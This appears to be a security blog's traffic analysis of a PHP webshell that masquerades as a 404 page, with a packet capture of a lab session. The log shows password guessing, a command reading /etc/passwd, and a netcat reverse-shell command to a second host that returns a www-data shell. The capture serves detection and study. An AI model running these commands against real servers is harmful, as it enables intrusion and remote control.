Text Example

404 Not Found PHP webshell backdoor Traffic Analysis, Screenshots Reverse Shell Spawn and full PCAP file download

Download Attachments

  • 1 pcap 404
    Date added: January 20, 2017 11:06 am Added by: admin File size: 76 KB Downloads: 156

404.php Webshell backdoor is a sneaky one, if an admin views the php page it will look as if the file is not there and benign:

http://computersecurity.org/images/pcapanalysis/404_1.png

The secret trick to logging into the shell is hitting the tab button and a little prompt will appear where you type in your password to access the shell:

http://computersecurity.org/images/pcapanalysis/404_2.png

 

And then we login:

http://computersecurity.org/images/pcapanalysis/404_3.png

 

 

Here is what the network traffic it generates looks like:

 

017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 02:34:21.438028 IP 192.168.1.100.55555 > 192.168.1.102.53294: Flags [P.], seq 1011:1834, ack 1125, win 254, length 823
E.._.>@.@..?…d…f……{..w..P….l..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:21 GMT
Server: Apache/2.4.18 (Debian)
Set-Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

……….MP.n.0.|.W….,..%..8.
ly*.bi….-a..Q…..Wr.m. …#u.Y.?H`O..U.:..B.`……5<………D .bl….y^…….%..;….r……G’.MB.9…u..g.;..!”(..3..5C.^2n….o.i..|+..c.o.j…y:K…..’.I?..&…?.n……..82. .)…0..I…p<9…ER.`…^uX..>.^.Y.a….=….*…

2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 1:614, ack 1, win 2053, length 613
E…..@…d<…f…d.0..2….&u.P…    J..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=letmein
2017-01-20 02:34:28.742666 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 614, win 238, length 0
E..(..@.@……d…f…0.&u.2.  .P….5..
2017-01-20 02:34:28.743719 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [P.], seq 1:767, ack 614, win 238, length 766
E..&..@.@……d…f…0.&u.2.  .P….3..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:28 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:33.005742 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 614:1228, ack 767, win 2050, length 614
E…..@…d8…f…d.0..2.      ..&x.P….|..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=password
2017-01-20 02:34:33.043487 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 1228, win 248, length 0
E..(..@.@……d…f…0.&x.2…P….5..
2017-01-20 02:34:33.359844 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], seq 767:5147, ack 1228, win 248, length 4380
E..D..@.@……d…f…0.&x.2…P….Q..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:33 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

 

2017-01-20 02:34:43.974969 IP 192.168.1.102.53297 > 192.168.1.100.55555: Flags [P.], seq 1:688, ack 1, win 2053, length 687
E…..@…c….f…d.1..H…….P….S..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 86
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251
2017-01-20 02:34:43.974988 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [.], ack 688, win 239, length 0
E..(..@.@……d…f…1….H..mP….5..
2017-01-20 02:34:44.314752 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [P.], seq 1:5231, ack 688, win 239, length 5230
E…..@.@..N…d…f…1….H..mP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:43 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], seq 1:712, ack 1, win 2053, length 711
E….9@…c….f…d.8……….P…….POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 109
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.139097 IP 192.168.1.100.55555 > 192.168.1.102.53304: Flags [.], ack 712, win 240, length 0
E..(.,@.@……d…f…8……..P….5..
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, win 29200, options [mss 1460,sackOK,TS val 759617908 ecr 0,nop,wscale 7], length 0
E..<D.@.@.q….d…e…\……….r..H………
-F.t……..
2017-01-20 02:35:30.611975 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [S.], seq 451231491, ack 3216154079, win 14480, options [mss 1460,sackOK,TS val 287395312 ecr 759617908,nop,wscale 6], length 0
E..<..@.@……e…d.\….?…….8..#………
.!M.-F.t….
2017-01-20 02:35:30.611988 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 759617909 ecr 287395312], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F.u.!M.

2017-01-20 02:35:36.943763 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [P.], seq 1:4, ack 1, win 227, options [nop,nop,TS val 287395945 ecr 759617909], length 3
E..7r.@.@.C….e…d.\….?………o……
.!Pi-F.uid

2017-01-20 02:35:36.943789 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F…!Pi
2017-01-20 02:35:36.944117 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 353:393, ack 160, win 408, options [nop,nop,TS val 287395945 ecr 759619491], length 40
E..\.@@.@.42…e…d…..x>^’bb……n…..
.!Pi-F…<T……z.?P%#{…j.A..9..b.<…….r..
2017-01-20 02:35:36.944130 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 393, win 951, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4u.@.@.@….d…e….’bb..x>……@…..
-F…!Pi
2017-01-20 02:35:36.945239 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [P.], seq 1:55, ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 54
E..jD.@.@.q….d…e…\……?……v…..
-F…!Piuid=33(www-data) gid=33(www-data) groups=33(www-data)

Leave a Reply